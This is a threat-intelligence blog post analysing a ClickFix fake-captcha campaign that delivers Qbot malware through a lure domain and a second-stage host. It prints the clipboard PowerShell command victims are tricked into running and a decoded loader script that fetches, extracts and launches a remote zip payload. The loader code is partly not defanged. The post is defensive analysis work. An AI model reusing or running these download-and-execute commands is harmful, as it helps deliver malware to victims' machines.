How ClickFix is being used to deliver Banking Trojan Quakbot (aka Qbot), Stealer Malware, Ransomware and other payloads.

March 24, 2025

Threat Intel

This week I’ve been following up on ClickFix campaigns and found an interesting campaign that uses ClickFix to spread Quakbot (or Qbot) malware.

ClickFix is a social engineering and malvertising technique threat actors use to distribute malware through fake update prompts. It typically appears on compromised websites, malicious ads, or phishing pages, tricking users into downloading and executing malicious payloads.

On the other hand, QuakBot (also known as Qbot) started as a banking trojan in 2007 but evolved into a modular malware loader used in delivering different payloads, including info stealers and ransomware and has been seen in malicious campaigns lately. Quakbot spreads through phishing emails, malicious attachments, and in this case, a ClickFix-style fake captcha. It uses PowerShell, VBA macros, or DLL sideloading to evade detection and establish persistence.

ClickFix instance after malicious redirection

In this scenario, www[.]protectedsound[.]digital redirects to a ClickFix instance at cfcaptcha[.]com

This instance of fake captcha tricks the user into carrying out unsuspecting activity on their local machine by utilising the Windows key + Rand pasting a malicious command already stored in the clipboard.

powershell -w 1 iwr hxxp://cfcaptcha[.]com/flwssetp[.]txt|iex # Request filtered by CF ( ID: c7d266e12202bf2e )

This command attempts to download a text file from the specified URL and then pass the output of the previous command (in this case, the contents of the downloaded file) as input to the next command. The iex at the end of the URL is short for Invoke-Expression, a PowerShell command that executes the string passed to it as a PowerShell command.

While the contents of the file at hxxp://cfcaptcha[.]com/flwssetp[.]txtare mostly encrypted, certain parts are seen in clear text and give insight into what the encrypted contents might be doing.

The highlighted command is a simple Powershell command that displays a graphical message box with the text “Verification complete!” and an “OK” button. This is intended to trick the user into assuming verification is okay and they can proceed on the website.

Fake powershell verification popup to further trick users

Another section of the obfuscated content was also noticeable and looked like an XOR decryption activity on a long hex string.

After being able to successfully decode the hex, we can get more insight into what that piece of code is trying to do:

Decrypted lines of obfuscated Powershell script

After a clean formatting, it looks more like:

Copy Code


# Execute a command from a URL
iex (Invoke-WebRequest -Uri "https://duolingos.com/flswunwa.zip" -UseBasicParsing).Content

# Define the destination path
$zOVDAoe = $env:AppData

# Function to download the file
function nvlHyvW($sjXQx, $xsrwrQg) {
Invoke-WebRequest -Uri $sjXQx -OutFile $xsrwrQg
}

# Main function to handle downloading, extracting, and executing
function iuXBxCXN {
function wqxtSr($FAEDLpZI) {
if (!(Test-Path -Path $xsrwrQg)) {
nvlHyvW $FAEDLpZI $xsrwrQg
}
}

# Define the path for the downloaded ZIP file
$xsrwrQg = Join-Path $env:AppData 'flswunwa.zip'

wqxtSr $RenUZWoWi.SubString(3, 34)

# Extract the ZIP file
Expand-Archive -Path $xsrwrQg -DestinationPath $zOVDAoe

# Load the necessary .NET assembly for ZIP file handling
Add-Type -AssemblyName System.IO.Compression.FileSystem

# Open the ZIP file and get the first entry
$RGBTpBiG = [IO.Compression.ZipFile]::OpenRead($xsrwrQg)
$HWkyDHn = ($RGBTpBiG.Entries | Sort-Object Name | Select-Object -First 1).Name

# Construct the full path to the extracted file
$ikQPuNLk = Join-Path $env:AppData $HWkyDHn

# Start the extracted file
Start-Process $ikQPuNLk
}

# Execute the main function
iuXBxCXN

As seen, it attempts to fetch a file from the domain duolingos[.]com. The domain has been active since January 23, 2025, while the initial domain with the ClearFix instance has been active since February 5th, 2025. Both domains were purchased within the space of two weeks.

While trying to manually download the file “hxxps://duolingos[.]com/flswunwa[.]zip”, I was greeted with a nonstop loader page.

You might assume that visiting the URL “hxxps://duolingos[.]com/flswunwa[.]zip” would serve you an actual .zip file stored in the specified directory. However, Qbot takes a different approach. Compromised websites exploited by Qbot or setup instances contain a .htaccess file with a rewrite rule that intercepts all requests under /subdir/. This allows Qbot operators to create the illusion of multiple files or subdirectories, such as:

hxxps://duolingos[.]com/xxxxx[.]zip
hxxps://duolingos[.]com/yyyyy[.]zip
hxxps://duolingos[.]com/files/zzzzz[.]zip

This technique serves two purposes:

Endless Unique URLs: It allows attackers to generate an infinite number of unique URLs for distributing malware, making it harder to block or detect malicious activity.
Obfuscation of Malicious Code: The real location of the malicious content is hidden, complicating efforts by website owners or security researchers to identify and remove the threat.

And that’s why trying to run hxxps://duolingos[.]com/flswunwa[.]zip in sandboxes didn’t provide much information about the file.

3/10 risk score by Recorded Future Sandbox

Medium risk score from Falcon Sandbox by Hybrid Analysis

In reality, all these requests are redirected by the rewrite rule to a malicious PHP script hosted on the compromised server. This PHP script acts as a proxy, fetching the actual malicious content from a secondary tier of servers controlled by the attackers.

In our case, the php script is in the body of the page:

intel threat

Share your thoughts Cancel reply